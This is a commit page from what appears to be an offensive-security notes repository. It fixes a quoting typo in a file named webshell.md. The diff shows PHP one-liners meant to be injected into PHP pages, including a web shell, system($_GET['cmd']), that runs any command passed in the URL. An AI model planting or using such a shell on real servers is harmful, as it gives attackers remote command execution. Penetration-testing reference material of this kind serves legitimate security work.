Commit 0da4dfaf authored by bobloblaw's avatar bobloblaw
Browse files

Update webshell.md

parent 5583394a
Loading
Loading
Loading
Loading
+1 −1
Original line number Diff line number Diff line
@@ -14,7 +14,7 @@ This code can be injected into pages that use php.
```php

# Execute one command
<?php system("whoami); ?>
<?php system("whoami"); ?>

# Take input from the url paramter. shell.php?cmd=whoami
<?php system($_GET['cmd']); ?>